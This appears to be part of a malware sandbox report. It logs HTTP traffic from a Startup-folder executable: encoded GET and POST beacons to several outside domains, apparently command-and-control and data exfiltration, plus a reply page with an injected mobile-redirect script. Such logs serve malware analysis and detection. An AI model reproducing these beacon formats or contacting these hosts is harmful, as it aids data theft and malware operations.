                                                                                                                                              Data Ascii: VX=w8bN3XVsOXgPocdM1fskUR7NcvKA9zPJIuH67A9uNiEjcQLzMgJ8CdBbeKgfghP5MvR5CoHLtK5q3XzxtMVQciUnJafGk/NNBslmotmBSg0F9YXIpa+6sib0EcxPNrTWLuQnszVazhpqZ23QO+0zghDVV0I6Vh3+XOJ4/IQEIrTXjPdjChP19jUgTo7C1XqVpTaFHV/ZURBYQrVlaAsdOsz4WzAuFdcrAldI8GQ1mUSQ7/IEhxP6uB1aj5k6m/TP4tgk/RY+pp8+ikrjNxg3v7u1+REQtPfhYPqQX0gbZjIBFbzBVHRjpHc2CyX+4KV2greqPxQPJK9nQ36kP3cH4VmUhVjDRDPf4D82JRSEXDD5j0cAbCOXjfwVdcgUVu7KLzpwQ3nEsT/M/b3yfFiLE+FUTMwWVlQVV2/TQWi1M2MCFJ/jiaT9eE8vzlsZ5YBpgjPIMokCZgL8b/DWfWhjMfWirWBLlGC6LADvGxKR+VCFcwFQ8PxcpbSWkUL0BdX1G3rvtY1RbybiGGI7VksoePDOmOdi5aNMtKckAL0GAurnJw/bPgl7eidrzdaKGA+BIdRHe+8aLRxRq+XJ4K1jiMuWkufbE9eC5dHlGZhj0YmxrvWaxmOXGojSqBt2qBIwMji60Ms3F/6hNziahbiYZ9rGdclOLJkIngDnOsggGpMQB2U49hcRXQLmJR0t9mNZXokCgkbydoBv+ZY8GEifo0D3UncpUdpLK9Drc4pvzN0QGZfHkY2clHyDIiKrySCMfl+XyviSMFfFy4W5AcldyNt/+VzLA9CrjjZ0yIs9zP/hA98zr+koko/85SWYdsK4k5PcfrdqjR54fHwvO2QVodTrQvc+9E27FkEDjUMFP/bFmMGFfj9t+YyQI1YUr43plqVbOkCW3tGrXF3KhJ5Oj1kZHmgKio5XzlN8N7F3soDG/dgr0pnjyerQZ+PfIL5JMuxrDs9DXFufVGOwSXCDFsNYr2aTsDpHOx9+syEU8hSUvVpDh [TRUNCATED]
                                                                                                                                              Nov 28, 2024 18:57:41.810650110 CET5233OUTData Raw: 78 56 42 75 78 41 37 39 68 4a 6e 44 51 33 76 77 6c 33 68 37 47 45 6f 36 72 72 63 54 53 63 6e 46 79 58 39 32 35 4d 59 30 39 62 4d 65 32 2b 58 51 47 35 61 33 4c 51 58 66 33 79 51 62 76 35 34 7a 58 68 4a 42 46 57 30 6a 52 6f 31 49 54 41 37 6d 6c 49
                                                                                                                                              Data Ascii: xVBuxA79hJnDQ3vwl3h7GEo6rrcTScnFyX925MY09bMe2+XQG5a3LQXf3yQbv54zXhJBFW0jRo1ITA7mlIt44bqx7jmzAQBMy+jmRa0Tx08vgcqVvoyrOuE30JPwDnCf2wC54U/690DYWkJV5BKKA1vt6x0KBoVAEFJTk+azBylnckbwkPDlZiCmHKInRuQjaXImjGBY14cH9Imsw7wZJ//aQzLSeTDnLd8PG38BUCVehnLX1Qn
                                                                                                                                              Nov 28, 2024 18:57:41.975275993 CET706INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:41 GMT
                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                                                                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              12192.168.11.204972723.225.34.75804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:44.510132074 CET392OUTGET /wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.bashei.top
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 18:57:44.673744917 CET1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:44 GMT
                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Data Raw: 35 64 39 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e [TRUNCATED]
                                                                                                                                              Data Ascii: 5d9<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><script type="text/javascript" src="https://js.users.51.la/21851687.js"></script><script language="javascript">if(window.navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad)/i)) {setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html"];window.location.href=arr[parseInt(Math.random()*arr.length)]},0000); }else if(window.navigator.userAgent.match(/(Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)){setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https:/ [TRUNCATED]
                                                                                                                                              Nov 28, 2024 18:57:44.673791885 CET395INData Raw: 6e 71 78 38 31 63 38 35 67 6e 31 6f 39 75 64 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 35 37 36 30 31 38 36 39 2f 35 37 36 30 31 38 36 39 61 35 2e 68 74 6d 6c 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 35 37 36 30 31 38 36 39 2e 78 6e 2d 2d 74 6e 71
                                                                                                                                              Data Ascii: nqx81c85gn1o9ud.com/download/57601869/57601869a5.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html","https://aa57601869.xn--tnqx
                                                                                                                                              Nov 28, 2024 18:57:44.673827887 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              13192.168.11.2049765172.67.149.5380
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:10.095244884 CET399OUTGET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.1win-moldovia.fun
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 19:02:13.152136087 CET970INHTTP/1.1 523
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:13 GMT
                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                              Content-Length: 15
                                                                                                                                              Connection: close
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5uX2Kv5W%2BEmiT4K0fQMChoVwzObS2qk5m7tI27SQwmt0gf0IpCqIn8oGRYLTdoGkyXLdVioy74K%2FhhLivgwwCcJEcBpQpuV5i1JQ5aFD2VzIVuxGXsohnmrO0zcD%2By0Erul5ZiVa5Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8e9c44759f0209f3-LAS
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=156948&min_rtt=156948&rtt_var=78474&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
                                                                                                                                              Data Ascii: error code: 523


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              14192.168.11.2049766217.70.184.5080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:18.481478930 CET657OUTPOST /l1qb/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Origin: http://www.akravchenko.dev
                                                                                                                                              Referer: http://www.akravchenko.dev/l1qb/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 199
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 69 6b 47 41 31 6a 4b 4c 4b 6f 73 5a 6d 47 6e 74 4e 4c 67 66 61 62 76 53 57 31 6e 4b 64 38 58 4d 61 63 74 2f 65 35 57 6a 43 5a 2b 47 6f 58 77 66 57 53 45 2f 45 70 53 7a 78 75 6f 36 5a 6a 65 69 79 35 59 47 59 56 42 77 50 36 77 73 43 4f 47 32 73 76 30 63 52 43 66 71 4c 52 65 79 74 69 71 37 6c 6c 50 78 4b 57 65 2b 35 36 4c 48 34 65 47 4a 2b 36 79 6b 37 52 67 4e 42 76 63 58 67 59 66 67 2f 4e 74 79 74 6d 37 4a 6c 65 43 6d 56 7a 6d 48 47 45 4d 33 75 44 47 62 37 73 65 57 69 32 72 6a 79 43 32 38 6f 2f 2f 49 39 31 42 67 46 2f 6f 35 38 51 63 2b 67 3d 3d
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrikGA1jKLKosZmGntNLgfabvSW1nKd8XMact/e5WjCZ+GoXwfWSE/EpSzxuo6Zjeiy5YGYVBwP6wsCOG2sv0cRCfqLReytiq7llPxKWe+56LH4eGJ+6yk7RgNBvcXgYfg/Ntytm7JleCmVzmHGEM3uDGb7seWi2rjyC28o//I91BgF/o58Qc+g==
                                                                                                                                              Nov 28, 2024 19:02:18.785362005 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:18 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              15192.168.11.2049767217.70.184.5080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:21.309232950 CET677OUTPOST /l1qb/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Origin: http://www.akravchenko.dev
                                                                                                                                              Referer: http://www.akravchenko.dev/l1qb/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 219
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 49 58 4d 37 41 74 2b 63 42 57 67 43 5a 2b 4f 49 58 78 41 6d 53 54 2f 45 31 67 7a 30 57 6f 36 5a 66 65 69 33 46 59 47 70 56 47 71 2f 36 79 6a 69 50 41 37 4d 76 30 63 52 43 66 71 4c 46 6b 79 73 4b 71 36 52 5a 50 77 70 4f 64 7a 5a 37 35 58 59 65 47 65 4f 36 4d 6b 37 51 46 4e 44 61 33 58 69 67 66 67 2b 39 74 6a 59 4b 34 41 6c 65 41 72 31 7a 31 4a 45 41 43 37 2b 72 35 54 62 6f 47 61 69 47 67 6d 6b 54 73 68 61 4c 62 4c 75 70 7a 6b 31 47 41 37 2b 52 48 6a 6c 66 6e 55 66 46 4e 4c 78 41 30 4a 48 6d 6d 6b 65 46 76 75 47 77 3d
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrHsGHWLKNqovWGGnmtLkfaXvSV53LvIXM7At+cBWgCZ+OIXxAmST/E1gz0Wo6Zfei3FYGpVGq/6yjiPA7Mv0cRCfqLFkysKq6RZPwpOdzZ75XYeGeO6Mk7QFNDa3Xigfg+9tjYK4AleAr1z1JEAC7+r5TboGaiGgmkTshaLbLupzk1GA7+RHjlfnUfFNLxA0JHmmkeFvuGw=
                                                                                                                                              Nov 28, 2024 19:02:21.611957073 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:21 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              16192.168.11.2049768217.70.184.5080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:24.152230024 CET2578OUTPOST /l1qb/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Origin: http://www.akravchenko.dev
                                                                                                                                              Referer: http://www.akravchenko.dev/l1qb/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 51 58 4c 4a 6b 74 2f 37 56 57 68 43 5a 2b 50 49 58 30 41 6d 53 53 2f 45 74 6b 7a 31 71 65 36 63 54 65 7a 68 78 59 41 62 39 47 2f 76 36 79 37 69 4f 48 32 73 76 39 63 52 79 54 71 4c 56 6b 79 73 4b 71 36 58 39 50 33 36 57 64 78 5a 36 4c 48 34 65 43 4a 2b 37 68 6b 34 67 2f 4e 44 66 4d 58 53 41 66 68 65 74 74 68 4b 53 34 50 6c 65 47 75 31 79 6f 4a 46 39 41 37 2b 6e 54 54 62 63 34 61 68 6d 67 71 56 36 56 6b 35 6e 2f 64 4f 31 4d 76 32 4f 4c 36 49 35 32 75 53 66 46 45 73 64 77 56 6c 41 78 50 6b 6d 74 6e 39 45 31 2f 54 54 70 41 4a 61 53 38 4e 37 6d 31 4e 34 6b 4e 6a 71 33 41 66 78 6a 48 35 6e 72 39 39 6c 53 75 30 64 4d 4c 61 54 78 4e 4a 46 36 4b 43 77 51 37 6b 49 31 6b 48 76 50 74 67 32 68 46 43 51 63 49 41 65 49 77 64 73 36 43 64 77 6f 55 6c 4b 31 38 6c 46 4a 59 66 31 35 77 46 4e 54 56 50 39 36 64 4c 51 62 76 37 55 51 5a 6e 2b 48 68 49 45 32 68 35 55 50 54 2f 63 69 50 71 73 [TRUNCATED]
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrHsGHWLKNqovWGGnmtLkfaXvSV53LvQXLJkt/7VWhCZ+PIX0AmSS/Etkz1qe6cTezhxYAb9G/v6y7iOH2sv9cRyTqLVkysKq6X9P36WdxZ6LH4eCJ+7hk4g/NDfMXSAfhetthKS4PleGu1yoJF9A7+nTTbc4ahmgqV6Vk5n/dO1Mv2OL6I52uSfFEsdwVlAxPkmtn9E1/TTpAJaS8N7m1N4kNjq3AfxjH5nr99lSu0dMLaTxNJF6KCwQ7kI1kHvPtg2hFCQcIAeIwds6CdwoUlK18lFJYf15wFNTVP96dLQbv7UQZn+HhIE2h5UPT/ciPqsUapPcK0/dgs34Xsh8dJi4D1ASxbqC2BVl0ZBui0kyjAQJcbQKDMW7fgYuAQ7fZfKMJO+qHJDxKwSo1gqn9IygNhcrNjn9yizqH1D6BfIkmySYWSwaWEK+pjF2H4uBphQbE6t6r+ypyBKoVSjCulhl7VeREoBS4u0q5U13RytUFz1WjBKDqtLiG81KYlCJUgmmBzXvfuoBZ2wDe8HCX5Bq4BkMJkGD4xaUK8JQGSZXym3Dn4Xy1Cfa3Db1pc84vPC+1yss6gufTJxiWR2fF/5c74SKrcPegw4y1gKyDq8rbW/tI4Di/VJAgDmEPii8NqHI2IC3Ag0wrMzvIDrZ4Otx8q+jdxURJ72kBUeTohTDtW7ibIIDKZDXRbmqID6QnzFG/kWWcvz2xoCRv6XUH3G4r/psoBAgvdcqubTsxCHTgla5fu0q2X/jgA8fyIYh/axN320FwUoEe4WPS7PVW5aOgO1rpo9KWFX7zk8Ey0Kh9AHYhj164CwTtbqWVUUzL7KfBhkr78CQqfV+NlxdpIzkTID8WwqECm563bcWGLMmf/LfrWQ0iPVquv2qT8aM3qXAdgdttayHIWNYl6a37jFuOC65QycuG54IXUymoGgjyS67MtmY5PwoWPLNrNeJ7ntLYqaSaHVS8vdQnJIM0tBtcOl9DxG+YN75J [TRUNCATED]
                                                                                                                                              Nov 28, 2024 19:02:24.152314901 CET5156OUTData Raw: 4d 4b 52 4f 67 7a 59 7a 6d 52 66 4c 70 36 72 53 43 36 68 37 55 76 4a 74 48 6e 71 77 57 49 43 62 41 53 37 75 4e 2b 4e 31 4c 49 7a 30 6b 42 43 4c 51 52 47 4e 4d 36 39 51 61 46 4a 59 56 72 55 56 7a 72 38 38 44 33 71 2b 4b 62 72 7a 5a 7a 73 73 4e 4c
                                                                                                                                              Data Ascii: MKROgzYzmRfLp6rSC6h7UvJtHnqwWICbAS7uN+N1LIz0kBCLQRGNM69QaFJYVrUVzr88D3q+KbrzZzssNLj0ZZQIUkpDNhStrK0Uq2OrFS9hF2R+ZFk5Vw0R+1PAYmMLcRePZ25sACdcKrHG22/6t2cfZGzVnYm+g8OYwrT0tS7KGAnBdVnm4B623RTL0v6911YpZB7aYHVDCf9sljVXrLEnXnIL5Bj48W7GtQ0ObY7XBqE7Ik6
                                                                                                                                              Nov 28, 2024 19:02:24.152358055 CET92OUTData Raw: 30 51 31 59 6a 68 63 48 46 76 54 4b 42 2f 55 76 42 62 65 61 63 2b 4a 53 62 47 71 79 37 79 38 6b 48 4f 57 35 32 73 76 45 55 69 37 53 31 48 72 67 76 71 72 42 47 4e 64 43 37 57 35 32 33 31 4e 72 33 71 34 2f 65 32 32 72 61 6d 4e 55 74 62 53 63 51 54
                                                                                                                                              Data Ascii: 0Q1YjhcHFvTKB/UvBbeac+JSbGqy7y8kHOW52svEUi7S1HrgvqrBGNdC7W5231Nr3q4/e22ramNUtbScQT4AH7wU4g==
                                                                                                                                              Nov 28, 2024 19:02:24.456875086 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:24 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
